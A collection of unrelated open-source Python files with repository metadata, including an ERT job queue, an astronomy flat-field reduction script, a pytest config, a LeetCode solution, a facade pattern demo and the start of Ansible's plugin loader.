return self._iget_driver_data(idx)
raise IndexError(
"index out of range, was: %d should be in [0, %d)" % (index, ls)
)
def exists(self, index):
return self[index]
def get_max_running(self):
return self.driver.get_max_running()
def set_max_running(self, max_running):
self.driver.set_max_running(max_running)
def get_max_job_duration(self):
return self._get_max_job_duration()
def set_max_job_duration(self, max_duration):
self._set_max_job_duration(max_duration)
@property
def max_submit(self):
return self._get_max_submit()
def killAllJobs(self):
# The queue will not set the user_exit flag before the
# queue is in a running state. If the queue does not
# change to running state within a timeout the C function
# will return False, and that False value is just passed
# along.
user_exit = self._start_user_exit()
if user_exit:
while self.isRunning():
time.sleep(0.1)
return True
else:
return False
def igetSimStart(self, job_index):
return self._iget_sim_start(self, job_index)
def getUserExit(self):
# Will check if a user_exit has been initated on the job. The
# queue can be queried about this status until a
# job_queue_reset() call is invoked, and that should not be
# done before the queue is recycled to run another batch of
# simulations.
return self._get_user_exit()
def set_pause_on(self):
self._set_pause_on()
def set_pause_off(self):
self._set_pause_off()
def free(self):
self._free()
def __len__(self):
return self._get_active_size()
def getJobStatus(self, job_number):
"""@rtype: JobStatusType"""
return self._get_job_status(job_number)
def did_job_time_out(self, job_number):
return self.job_list[job_number].timed_out
def is_active(self):
for job in self.job_list:
if (
job.thread_status == ThreadStatus.READY
or job.thread_status == ThreadStatus.RUNNING
or job.thread_status == ThreadStatus.STOPPING
):
return True
return False
def fetch_next_waiting(self):
for job in self.job_list:
if job.thread_status == ThreadStatus.READY:
return job
return None
def count_status(self, status):
return len([job for job in self.job_list if job.status == status])
@property
def stopped(self):
return self._stopped
def kill_all_jobs(self):
self._stopped = True
@property
def queue_size(self):
return len(self.job_list)
@property
def ok_file(self):
return self._get_ok_file()
@property
def exit_file(self):
return self._get_exit_file()
@property
def status_file(self):
return self._get_status_file()
def add_job(self, job, iens):
job.convertToCReference(None)
queue_index = self._add_job(job)
self.job_list.append(job)
self._differ.add_state(queue_index, iens, job.status.value)
return queue_index
def count_running(self):
return sum(job.thread_status == ThreadStatus.RUNNING for job in self.job_list)
def max_running(self):
if self.get_max_running() == 0:
return len(self.job_list)
else:
return self.get_max_running()
def available_capacity(self):
return not self.stopped and self.count_running() < self.max_running()
def stop_jobs(self):
for job in self.job_list:
job.stop()
while self.is_active():
time.sleep(1)
async def stop_jobs_async(self):
for job in self.job_list:
job.stop()
while self.is_active():
await asyncio.sleep(1)
def assert_complete(self):
for job in self.job_list:
if job.thread_status != ThreadStatus.DONE:
msg = "Unexpected job status type after running job: {} with thread status: {}"
raise AssertionError(msg.format(job.status, job.thread_status))
def launch_jobs(self, pool_sema):
# Start waiting jobs
while self.available_capacity():
job = self.fetch_next_waiting()
if job is None:
break
job.run(
driver=self.driver,
pool_sema=pool_sema,
max_submit=self.max_submit,
)
def execute_queue(self, pool_sema, evaluators):
while self.is_active() and not self.stopped:
self.launch_jobs(pool_sema)
time.sleep(1)
if evaluators is not None:
for func in evaluators:
func()
if self.stopped:
self.stop_jobs()
self.assert_complete()
@staticmethod
def _translate_change_to_cloudevent(ee_id, real_id, status):
return CloudEvent(
{
"type": _queue_state_event_type(status),
"source": f"/ert/ee/{ee_id}/real/{real_id}/step/{0}",
"datacontenttype": "application/json",
},
{
"queue_event_type": status,
},
)
@staticmethod
async def _publish_changes(ee_id, changes, websocket):
events = [
JobQueue._translate_change_to_cloudevent(ee_id, real_id, status)
for real_id, status in changes.items()
]
for event in events:
await websocket.send(to_json(event))
async def execute_queue_async(
self, ws_uri, ee_id, pool_sema, evaluators, cert=None, token=None
):
if cert is not None:
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ssl_context.load_verify_locations(cadata=cert)
else:
ssl_context = True if ws_uri.startswith("wss") else None
headers = Headers()
if token is not None:
headers["token"] = token
async with websockets.connect(
ws_uri, ssl=ssl_context, extra_headers=headers
) as websocket:
await JobQueue._publish_changes(ee_id, self._differ.snapshot(), websocket)
try:
while True:
self.launch_jobs(pool_sema)
await asyncio.sleep(1)
if evaluators is not None:
for func in evaluators:
func()
await JobQueue._publish_changes(
ee_id, self.changes_after_transition(), websocket
)
if not self.is_active() or self.stopped:
break
except asyncio.CancelledError:
if self.stopped:
logger.debug(
"observed that the queue had stopped after cancellation, stopping jobs..."
)
self.stop_jobs()
logger.debug("jobs now stopped (after cancellation)")
raise
if self.stopped:
logger.debug("observed that the queue had stopped, stopping jobs...")
await self.stop_jobs_async()
logger.debug("jobs now stopped")
self.assert_complete()
self._differ.transition(self.job_list)
await JobQueue._publish_changes(ee_id, self._differ.snapshot(), websocket)
def add_job_from_run_arg(self, run_arg, res_config, max_runtime, ok_cb, exit_cb):
job_name = run_arg.job_name
run_path = run_arg.runpath
job_script = res_config.queue_config.job_script
num_cpu = res_config.queue_config.num_cpu
if num_cpu == 0:
num_cpu = res_config.ecl_config.num_cpu
job = JobQueueNode(
job_script=job_script,
job_name=job_name,
run_path=run_path,
num_cpu=num_cpu,
status_file=self.status_file,
ok_file=self.ok_file,
exit_file=self.exit_file,
done_callback_function=ok_cb,
exit_callback_function=exit_cb,
callback_arguments=[run_arg, res_config],
max_runtime=max_runtime,
)
if job is None:
return
run_arg._set_queue_index(self.add_job(job, run_arg.iens))
def add_ee_stage(self, stage, callback_timeout=None):
job = JobQueueNode(
job_script=stage.get_job_script(),
job_name=stage.get_job_name(),
run_path=stage.get_run_path(),
num_cpu=stage.get_num_cpu(),
status_file=self.status_file,
ok_file=self.ok_file,
exit_file=self.exit_file,
done_callback_function=stage.get_done_callback(),
exit_callback_function=stage.get_exit_callback(),
callback_arguments=stage.get_callback_arguments(),
max_runtime=stage.get_max_runtime(),
callback_timeout=callback_timeout,
)
if job is None:
raise ValueError("JobQueueNode constructor created None job")
iens = stage.get_run_arg().iens
stage.get_run_arg()._set_queue_index(self.add_job(job, iens))
def stop_long_running_jobs(self, minimum_required_realizations):
finished_realizations = self.count_status(JobStatusType.JOB_QUEUE_DONE)
if finished_realizations < minimum_required_realizations:
return
completed_jobs = [
job for job in self.job_list if job.status == JobStatusType.JOB_QUEUE_DONE
]
average_runtime = sum([job.runtime for job in completed_jobs]) / float(
len(completed_jobs)
)
for job in self.job_list:
if job.runtime > LONG_RUNNING_FACTOR * average_runtime:
job.stop()
def snapshot(self) -> typing.Optional[typing.Dict[int, str]]:
"""Return the whole state, or None if there was no snapshot."""
return self._differ.snapshot()
def changes_after_transition(self) -> typing.Dict[int, str]:
old_state, new_state = self._differ.transition(self.job_list)
return self._differ.diff_states(old_state, new_state)
def add_ensemble_evaluator_information_to_jobs_file(
self, ee_id, dispatch_url, cert, token
):
for q_index, q_node in enumerate(self.job_list):
if cert is not None:
cert_path = f"{q_node.run_path}/{CERT_FILE}"
with open(cert_path, "w") as cert_file:
cert_file.write(cert)
with open(f"{q_node.run_path}/{JOBS_FILE}", "r+") as jobs_file:
data = json.load(jobs_file)
data["ee_id"] = ee_id
data["real_id"] = self._differ.qindex_to_iens(q_index)
data["step_id"] = 0
data["dispatch_url"] = dispatch_url
data["ee_token"] = token
data["ee_cert_path"] = cert_path if cert is not None else None
jobs_file.seek(0)
jobs_file.truncate()
json.dump(data, jobs_file, indent=4)
|
joakim-hove/ert
|
res/job_queue/queue.py
|
Python
|
gpl-3.0
| 20,103
|
def makeflat(lista):
# print "LOGX:: Entering `makeflat` method/function in %(__file__)s" %
# globals()
flat = ''
import datetime
import glob
import os
import ntt
from ntt.util import readhdr, readkey3, delete, name_duplicate, updateheader, correctcard
from pyraf import iraf
iraf.images(_doprint=0, Stdout=0)
iraf.imutil(_doprint=0, Stdout=0)
iraf.imgeom(_doprint=0, Stdout=0)
# iraf.blkavg(_doprint=0, Stdout=0)
iraf.noao(_doprint=0, Stdout=0)
iraf.imred(_doprint=0, Stdout=0)
iraf.generic(_doprint=0, Stdout=0)
toforget = ['imgeom.blkavg', 'imutil.imarith',
'immatch.imcombine', 'noao.imred']
for t in toforget:
iraf.unlearn(t)
import datetime
MJDtoday = 55927 + (datetime.date.today() - datetime.date(2012, 01, 01)).days
_date = readkey3(readhdr(lista[0]), 'date-night')
_filter = readkey3(readhdr(lista[0]), 'filter')
output = name_duplicate(
lista[3], 'flat_' + str(_date) + '_' + str(_filter) + '_' + str(MJDtoday), '')
if os.path.isfile(output):
answ = raw_input('file already prooduced, do again [y/[n]] ? ')
if not answ:
answ = 'n'
else:
answ = 'y'
if answ in ['yes', 'y', 'YES', 'Y', 'Yes']:
delete("temp_off.fits,temp_off_mask.fits,temp_on_mask.fits,temp_on.fits")
iraf.image.immatch.imcombine(
lista[0] + ',' + lista[7], output="temp_off.fits")
iraf.image.immatch.imcombine(
lista[1] + ',' + lista[6], output="temp_off_mask.fits")
iraf.image.immatch.imcombine(
lista[2] + ',' + lista[5], output="temp_on_mask.fits")
iraf.image.immatch.imcombine(
lista[3] + ',' + lista[4], output="temp_on.fits")
# create the bias correction for the flat-on according to the
# Lidman technique0
delete("temp_onA.fits,temp_onC.fits,temp_onB.fits,temp_onAC.fits,temp_onACB.fits,temp_onACB_2D.fits")
delete("temp_on_bias.fits")
iraf.imgeom.blkavg(
input="temp_on.fits[500:600,*]", output="temp_onA.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_on_mask.fits[500:600,*]", output="temp_onC.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_on_mask.fits[50:150,*]", output="temp_onB.fits", option="average", b1=101, b2=1)
iraf.imutil.imarith("temp_onA.fits", "-",
"temp_onC.fits", "temp_onAC.fits")
iraf.imutil.imarith("temp_onAC.fits", "+",
"temp_onB.fits", "temp_onACB.fits")
iraf.imgeom.blkrep(input="temp_onACB.fits",
output="temp_onACB_2D.fits", b1=1024, b2=1)
iraf.imutil.imarith("temp_on.fits", "-",
"temp_onACB_2D.fits", "temp_on_bias.fits")
# same as above for the flat-off
delete("temp_offA.fits,temp_offC.fits,temp_offB.fits,temp_offAC.fits,temp_offACB.fits,temp_offACB_2D.fits")
delete("temp_off_bias.fits")
iraf.imgeom.blkavg(
input="temp_off.fits[500:600,*]", output="temp_offA.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_off_mask.fits[500:600,*]", output="temp_offC.fits", option="average", b1=101, b2=1)
iraf.imgeom.blkavg(
input="temp_off_mask.fits[50:150,*]", output="temp_offB.fits", option="average", b1=101, b2=1)
iraf.imutil.imarith("temp_offA.fits", "-",
"temp_offC.fits", "temp_offAC.fits")
iraf.imutil.imarith("temp_offAC.fits", "+",
"temp_offB.fits", "temp_offACB.fits")
iraf.imgeom.blkrep(input="temp_offACB.fits",
output="temp_offACB_2D.fits", b1=1024, b2=1)
iraf.imutil.imarith("temp_off.fits", "-",
"temp_offACB_2D.fits", "temp_off_bias.fits")
# create the corrected flat-field
# output=name_duplicate("temp_on_bias.fits",'flat_'+str(_date)+'_'+str(_filter)+'_'+str(MJDtoday),'')
output = name_duplicate(
lista[3], 'flat_' + str(_date) + '_' + str(_filter) + '_' + str(MJDtoday), '')
# print lista[0],'flat_'+str(_date)+'_'+str(_filter)+'_'+str(MJDtoday)
delete(output)
iraf.imutil.imarith("temp_on_bias.fits", "-",
"temp_off_bias.fits", output)
iraf.noao.imred.generic.normalize(output) # normalize the flat-field
correctcard(output)
delete("temp_on*.fits") # delete the temporary images
delete("temp_off*.fits")
print 'flat -> ' + str(output)
else:
print 'skip redoing the flat'
return output
def makeillumination(lista,flatfield):#,outputfile,illum_frame):
import os,glob,string,re
from astropy.io import fits as pyfits
import ntt
from ntt.util import readhdr, readkey3, delete, display_image, defsex, name_duplicate, correctcard
from numpy import compress, array, argmax, argmin, min, argsort, float32
import datetime
MJDtoday = 55927 + (datetime.date.today() - datetime.date(2012, 01, 01)).days
_date = readkey3(readhdr(lista[0]), 'date-night')
_filter = readkey3(readhdr(lista[0]), 'filter')
illum_frame = name_duplicate(
lista[0], 'illum_' + _date + '_' + _filter + '_' + str(MJDtoday), '')
from pyraf import iraf
iraf.images(_doprint=0, Stdout=0)
iraf.imutil(_doprint=0, Stdout=0)
iraf.utilities(_doprint=0, Stdout=0)
iraf.noao(_doprint=0, Stdout=0)
iraf.imred(_doprint=0, Stdout=0)
iraf.ccdred(_doprint=0, Stdout=0)
iraf.digiphot(_doprint=0, Stdout=0)
iraf.daophot(_doprint=0, Stdout=0)
iraf.generic(_doprint=0, Stdout=0)
toforget = ['digiphot.daophot', 'imutil.imarith',
'image', 'utilities.surfit']
for t in toforget:
iraf.unlearn(t)
n = len(lista)
# start loop to read image names from the input file
lista1 = []
iraf.ccdred.verbose = 'no'
ff = open('templist.lst', 'w')
for i in range(0, len(lista)):
ff.write('C' + lista[i] + '\n')
delete('C' + lista[i])
delete('C' + re.sub('.fits', '_sub.fits', lista[i]))
ntt.sofiphotredudef.crosstalk(lista[i], 'C' + lista[i])
iraf.noao.imred.ccdred.ccdproc('C' + lista[i], output='', overscan="no", trim="yes", ccdtype='', darkcor='no', fixpix='no', zerocor="no", flatcor='yes',
illumco='no', trimsec='[1:1024,1:1007]', biassec='', flat=flatfield, illum='')
correctcard('C' + lista[i])
lista1.append('C' + lista[i])
ff.close()
print '\n### prereducing STD frames to compute illumination correction ........'
lista2, skyfile = ntt.sofiphotredudef.skysub(lista1, readkey3(
readhdr(lista1[0]), 'ron'), readkey3(readhdr(lista1[0]), 'gain'), True)
lista2 = ntt.sofiphotredudef.sortbyJD(lista2)
print '\n### use x on the star and q to continue....'
display_image(lista2[0], 2, '', '', False)
delete('tmpone.coo')
iraf.image.tv.imexamine(lista2[0], 2, logfile='tmpone.coo',
keeplog='yes', xformat='', yformat='', wcs='logical')
iraf.tvmark(2, 'tmpone.coo', mark="circle", number='yes',
label='no', radii=8, nxoffse=5, nyoffse=5, color=204, txsize=2)
xycoo = iraf.proto.fields('tmpone.coo', '1,2', Stdout=1)
x0, y0 = string.split(xycoo[0])
x0 = float(x0)
y0 = float(y0)
xcum0 = readkey3(readhdr(lista2[0]), 'xcum')
ycum0 = readkey3(readhdr(lista2[0]), 'ycum')
iraf.digiphot(_doprint=0, Stdout=0)
iraf.daophot(_doprint=0, Stdout=0)
iraf.noao.digiphot.daophot.datapars.datamin = -1000
iraf.noao.digiphot.daophot.datapars.datamax = 60000
iraf.noao.digiphot.daophot.daopars.function = 'gauss'
iraf.noao.digiphot.daophot.photpars.zmag = 0
namesex = defsex('default.sex')
for i in range(0, len(lista2)):
j = i + 1
xcum = readkey3(readhdr(lista2[i]), 'xcum')
ycum = readkey3(readhdr(lista2[i]), 'ycum')
xx = x0 - xcum0 + xcum
yy = y0 - ycum0 + ycum
# sex objects
os.system('sex ' + lista2[i] + ' -c ' + namesex + '> _logsex')
delete('_logsex')
xpix = iraf.proto.fields('detections.cat', fields='2', Stdout=1)
ypix = iraf.proto.fields('detections.cat', fields='3', Stdout=1)
cm = iraf.proto.fields('detections.cat', fields='4', Stdout=1)
cm = compress((array(xpix) != ''), array(cm, float))
ypix = compress((array(xpix) != ''), array(ypix, float))
xpix = compress((array(xpix) != ''), array(xpix, float))
if len(xpix) > 300:
num = 300
else:
num = len(xpix) - 1
xpix = xpix[argsort(cm)][0:num]
ypix = ypix[argsort(cm)][0:num]
distance = (ypix - yy)**2 + (xpix - xx)**2
xx1, yy1 = xpix[argmin(distance)], ypix[argmin(distance)]
f = open('tmpone.coo', 'w')
f.write(str(xx1) + ' ' + str(yy1) + '\n')
f.close()
display_image(lista2[i], 1, '', '', False)
iraf.tvmark(1, 'tmpone.coo', mark="circle", number='yes',
label='no', radii=8, nxoffse=5, nyoffse=5, color=204, txsize=2)
answ = 'n'
while answ != 'y':
answ = raw_input('selected the right one [[y]/n] ?')
if not answ:
answ = 'y'
if answ in ['y', 'YES', 'yes', 'Y']:
print lista2[i]
delete('pippo.' + str(j) + '.mag')
gggg = iraf.digiphot.daophot.phot(
lista2[i], "tmpone.coo", output="pippo." + str(j) + ".mag", verify='no', interac='no', Stdout=1)
try:
float(string.split(gggg[0])[3])
answ = 'y'
except:
print '\n### warning'
answ = 'n'
else:
print '\n### select the std star'
display_image(lista2[i], 1, '', '', False)
iraf.image.tv.imexamine(lista2[
i], 1, logfile='tmpone.coo', keeplog='yes', xformat='', yformat='', wcs='logical')
xycoo = iraf.proto.fields('tmpone.coo', '1,2', Stdout=1)
x2, y2 = string.split(xycoo[0])
f = open('tmpone.coo', 'w')
f.write(str(x2) + ' ' + str(y2) + '\n')
f.close()
delete('pippo.' + str(j) + '.mag')
print '###### new selection ' + str(x2), str(y2)
gggg = iraf.digiphot.daophot.phot(
lista2[i], "tmpone.coo", output='pippo.' + str(j) + '.mag', verify='no', interac='no', Stdout=1)
try:
float(string.split(gggg[0])[3])
answ = 'y'
except:
print '\n### warning'
answ = 'n'
os.system('ls pippo.*.mag > tempmag.lst')
tmptbl0 = iraf.txdump(textfile="@tempmag.lst",
fields="XCENTER,YCENTER,FLUX", expr='yes', Stdout=1)
ff = open('magnitudini', 'w')
for i in tmptbl0:
ff.write(i + '\n')
ff.close()
# delete the temporary images and files
delete("temp*.fits")
delete('temp*.lst')
delete(illum_frame)
print '\n### fitting the illumination surface...'
aaa = iraf.utilities.surfit('magnitudini', image=illum_frame, function="polynomial",
xorder=2, yorder=2, xterms="full", ncols=1024, nlines=1024, Stdout=1)
iraf.noao.imred.generic.normalize(illum_frame)
correctcard(lista[0])
data, hdr = pyfits.getdata(illum_frame, 0, header=True)
data0, hdr0 = pyfits.getdata(lista[0], 0, header=True)
delete(illum_frame)
pyfits.writeto(illum_frame, float32(data), hdr0)
flatfield0 = string.split(flatfield, '/')[-1]
ntt.util.updateheader(
illum_frame, 0, {'MKILLUM': [flatfield0, 'flat field']})
display_image(illum_frame, 1, '', '', False)
for i in range(0, len(lista)): # in lista:
img = lista[i]
delete('pippo.' + str(i) + '.mag')
delete('C' + img)
delete('C' + re.sub('.fits', '_sky.fits', img))
# delete('C*.fits.mag.1')
# iraf.hedit(illum_frame,'MKILLUM','Illum. corr. created '+flatfield,add='yes',update='yes',verify='no')
return illum_frame
###############################################################################
# select files
def doflatsofi(flats, _doflat, illum, _output):
# print "LOGX:: Entering `doflatsofi` method/function in %(__file__)s" %
# globals()
import ntt
from ntt.util import display_image, delete, searchflat, name_duplicate
from pyraf import iraf
import glob
import string
onofflimit = {'J': 1000, 'H': 1000, 'Ks': 5000}
masklimit = {'J': {'ON': 1000, 'OFF': 30}, 'H': {
'ON': 1000, 'OFF': 40}, 'Ks': {'ON': 1000, 'OFF': 1000}}
if flats and _doflat:
listaflat = []
for _filter in flats:
for ID in flats[_filter]:
images = flats[_filter][ID]
if len(images) == 8:
mflat = makeflat(images)
listaflat.append(mflat)
display_image(mflat, 1, '', '', False)
raw_input('go on ')
elif len(images) != 8: # % 8 == 0:
print '\n### to compute a flat field you need a sequence of 8 calibration files in the following orders:'
print 'OFF OFFMASK ONMASK ON ON ONMASK OFFMASK OFF\n'
print len(images), _filter, ID
tipo = ['OFF', 'OFFMASK', 'ONMASK', 'ON',
'ON', 'ONMASK', 'OFFMASK', 'OFF']
listtmp = []
ii = 0
nn = 0
for img in images:
onoffvalue = float(string.split(iraf.imstat(
img + '[500:600,900:1000]', Stdout=1)[1])[2])
maskvalue = float(string.split(iraf.imstat(
img + '[100:200,900:1000]', Stdout=1)[1])[2])
if onoffvalue >= onofflimit[_filter]:
onoff = 'ON'
else:
onoff = 'OFF'
if maskvalue >= masklimit[_filter][onoff]:
mask = 'none'
else:
mask = 'MASK'
# display_image(img,1,'','',False)
print onoff, mask, onoffvalue, maskvalue, img, tipo[nn]
for img in images:
onoffvalue = float(string.split(iraf.imstat(
img + '[500:600,900:1000]', Stdout=1)[1])[2])
maskvalue = float(string.split(iraf.imstat(
img + '[100:200,900:1000]', Stdout=1)[1])[2])
if onoffvalue >= onofflimit[_filter]:
onoff = 'ON'
else:
onoff = 'OFF'
if maskvalue >= masklimit[_filter][onoff]:
mask = 'none'
else:
mask = 'MASK'
display_image(img, 1, '', '', False)
print onoff, mask, onoffvalue, maskvalue, img, tipo[nn]
answ = raw_input('ok [[y]/n/r/s] ? ')
if not answ:
answ = 'y'
if answ == 'y':
listtmp.append(img)
ii = ii + 1
nn = nn + 1
if len(listtmp) == 8:
print '### number images selected: ', str(len(listtmp))
mflat = ntt.soficalibdef.makeflat(listtmp)
listaflat.append(mflat)
display_image(mflat, 1, '', '', False)
nn = 0
listtmp = []
elif answ == 'r':
listtmp = []
ii = 0
nn = 0
elif answ == 's':
break
else:
print len(images), _filter, ID
print '### number images selected: ', str(len(listtmp))
else:
listaflat = flats
listaillum = []
if illum:
for _filter in illum:
for ID in illum[_filter]:
images = illum[_filter][ID]
flatfield = searchflat(images[0], listaflat)[0]
if flatfield:
illum_frame = ntt.soficalibdef.makeillumination(
images, flatfield)
listaillum.append(illum_frame)
else:
print 'flat field not found'
for img in listaflat:
try:
ntt.util.phase3header(img) # phase 3 definitions
ntt.util.updateheader(
img, 0, {'BUNIT': ['ADU', 'pixel units(ADU,electrons)']})
ntt.util.updateheader(
img, 0, {'FILETYPE': [31202, 'flat field']})
except:
print '\n### problems with phase 3 definitions'
for img in listaillum:
try:
ntt.util.phase3header(img) # phase 3 definitions
ntt.util.updateheader(
img, 0, {'BUNIT': ['ADU', 'pixel units(ADU,electrons)']})
ntt.util.updateheader(
img, 0, {'FILETYPE': [31213, 'illum corr frames']})
except:
print '\n### problems with phase 3 definitions'
return listaflat, listaillum
###########################################################################
|
svalenti/pessto
|
trunk/src/ntt/soficalibdef.py
|
Python
|
mit
| 18,166
|
# -*- coding: utf-8 -*-
"""
################################################################################
# #
# media_editing #
# #
################################################################################
# #
# LICENCE INFORMATION #
# #
# This program provides media editing utilities. #
# #
# copyright (C) 2018 Will Breaden Madden, wbm@protonmail.ch #
# #
# This software is released under the terms of the GNU General Public License #
# version 3 (GPLv3). #
# #
# This program is free software: you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# For a copy of the GNU General Public License, see #
# <http://www.gnu.org/licenses/>. #
# #
################################################################################
"""
|
wdbm/media_editing
|
media_editing.py
|
Python
|
gpl-3.0
| 2,382
|
import pytest
from tests.plugins.upload_to_s3 import upload_file_to_s3_by_job_id
pytest_plugins = (
"tests.examples.examples_report_plugin",
"tests.integration.integration_tests_plugin",
"tests.plugins.bokeh_server",
"tests.plugins.image_diff",
"tests.plugins.jupyter_notebook",
"tests.plugins.file_server",
"tests.plugins.phantomjs_screenshot",
)
def pytest_addoption(parser):
parser.addoption(
"--upload", dest="upload", action="store_true", default=False, help="upload test artefacts to S3"
)
parser.addoption(
"--log-file", dest="log_file", metavar="path", action="store", default='examples.log', help="where to write the complete log"
)
def pytest_sessionfinish(session, exitstatus):
try_upload = session.config.option.upload
seleniumreport = session.config.option.htmlpath
is_slave = hasattr(session.config, 'slaveinput')
if try_upload and seleniumreport and not is_slave:
upload_file_to_s3_by_job_id(seleniumreport, "text/html", "INTEGRATION TESTS REPORT")
@pytest.yield_fixture(scope="session")
def log_file(request):
is_slave = hasattr(request.config, 'slaveinput')
if not is_slave:
with open(request.config.option.log_file, 'w') as f:
# Clean-out any existing log-file
f.write("")
with open(pytest.config.option.log_file, 'a') as f:
yield f
|
philippjfr/bokeh
|
tests/conftest.py
|
Python
|
bsd-3-clause
| 1,395
|
# -*- coding: utf-8 -*-
# Copyright © 2012 Peter Schnebel <pschnebel@gmx.de>
# This file is part of python-ads.
#
# python-ads is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# python-ads is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# python-ads. If not, see <http://www.gnu.org/licenses/>.
# FIXME: prepare logging stuff here?
import logging
class Log(object):
def __init__(self, module):
self._logger = logging.getLogger("%s" % module.ljust(12))
class Logger(object):
__logger = None
@staticmethod
def set_logger(logger): Logger.__logger = logger
@staticmethod
def info(msg): Logger.__logger.info(msg)
@staticmethod
def debug(msg): Logger.__logger.debug(msg)
@staticmethod
def error(msg): Logger.__logger.error(msg)
# vim: set ai ts=2 sw=2 sts=2 expandtab:
# eof
|
pscn/ads
|
src/log.py
|
Python
|
gpl-3.0
| 1,254
|
def max_rectangle(heights):
res = 0
heights.append(0)
stack = [0]
for i in range(1, len(heights)):
while stack and heights[i] < heights[stack[-1]]:
h = heights[stack.pop()]
w = i if not stack else i - stack[-1] - 1
res = max(res, h * w)
stack.append(i)
return res
class Solution:
def maximalRectangle(self, matrix):
"""
:type matrix: List[List[str]]
:rtype: int
"""
if not matrix or not matrix[0]:
return 0
m = len(matrix)
n = len(matrix[0])
heights = [1 if x == '1' else 0 for x in matrix[0]]
ans = max_rectangle(heights)
for i in range(1, m):
for j in range(n):
heights[j] = 0 if matrix[i][j] == '0' else heights[j] + 1
ans = max(ans, max_rectangle(heights))
return ans
if __name__ == "__main__":
sol = Solution()
M = [['1', '0', '1', '0', '0'],
['1', '0', '1', '1', '1'],
['1', '1', '1', '1', '1'],
['1', '0', '0', '1', '0']]
print(sol.maximalRectangle(M))
|
shenfei/oj_codes
|
leetcode/python/n85_Maximal_Rectangle.py
|
Python
|
mit
| 1,123
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
SLEEP = 0.5
# Complex Parts
class TC1:
def run(self):
print("###### In Test 1 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
class TC2:
def run(self):
print("###### In Test 2 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
class TC3:
def run(self):
print("###### In Test 3 ######")
time.sleep(SLEEP)
print("Setting up")
time.sleep(SLEEP)
print("Running test")
time.sleep(SLEEP)
print("Tearing down")
time.sleep(SLEEP)
print("Test Finished\n")
# Facade
class TestRunner:
def __init__(self):
self.tc1 = TC1()
self.tc2 = TC2()
self.tc3 = TC3()
self.tests = [self.tc1, self.tc2, self.tc3]
def runAll(self):
[i.run() for i in self.tests]
# Client
if __name__ == '__main__':
testrunner = TestRunner()
testrunner.runAll()
### OUTPUT ###
# ###### In Test 1 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
# ###### In Test 2 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
# ###### In Test 3 ######
# Setting up
# Running test
# Tearing down
# Test Finished
#
|
NicovincX2/Python-3.5
|
Génie logiciel/Architecture logicielle/Patron de conception/Patron de structure/facade.py
|
Python
|
gpl-3.0
| 1,596
|
# (c) 2012, Daniel Hokka Zakrisson <daniel@hozac.com>
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import glob
import imp
import inspect
import os
import os.path
import sys
import warnings
from collections import defaultdict
from ansible import constants as C
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
# Global so that all instances of a PluginLoader will share the caches
MODULE_CACHE = {}
PATH_CACHE = {}
PLUGIN_PATH_CACHE = {}
def get_all_plugin_loaders():
return [(name, obj) for (name, obj) in inspect.getmembers(sys.modules[__name__]) if isinstance(obj, PluginLoader)]
class PluginLoader:
'''
PluginLoader loads plugins from the configured plugin directories.
It searches for plugins by iterating through the combined list of
play basedirs, configured paths, and the python path.
The first match is used.
'''
def __init__(self, class_name, package, config, subdir, aliases={}, required_base_class=None):
self.class_name = class_name
self.base_class = required_base_class
self.package = package
self.config = config
self.subdir = subdir
self.aliases = aliases
if not class_name in MODULE_CACHE:
MODULE_CACHE[class_name] = {}
if not class_name in PATH_CACHE:
PATH_CACHE[class_name] = None
if not class_name in PLUGIN_PATH_CACHE:
PLUGIN_PATH_CACHE[class_name] = defaultdict(dict)
self._module_cache = MODULE_CACHE[class_name]
self._paths = PATH_CACHE[class_name]
self._plugin_path_cache = PLUGIN_PATH_CACHE[class_name]
self._extra_dirs = []
self._searched_paths = set()
def __setstate__(self, data):
'''
Deserializer.
'''
class_name = data.get('class_name')
package = data.get('package')
config = data.get('config')
subdir = data.get('subdir')
aliases = data.get('aliases')
base_class = data.get('base_class')
PATH_CACHE[class_name] = data.get('PATH_CACHE')
PLUGIN_PATH_CACHE[class_name] = data.get('PLUGIN_PATH_CACHE')
self.__init__(class_name, package, config, subdir, aliases, base_class)
self._extra_dirs = data.get('_extra_dirs', [])
self._searched_paths = data.get('_searched_paths', set())
def __getstate__(self):
'''
Serializer.
'''
return dict(
class_name = self.class_name,
base_class = self.base_class,
package = self.package,
config = self.config,
subdir = self.subdir,
aliases = self.aliases,
_extra_dirs = self._extra_dirs,
_searched_paths = self._searched_paths,
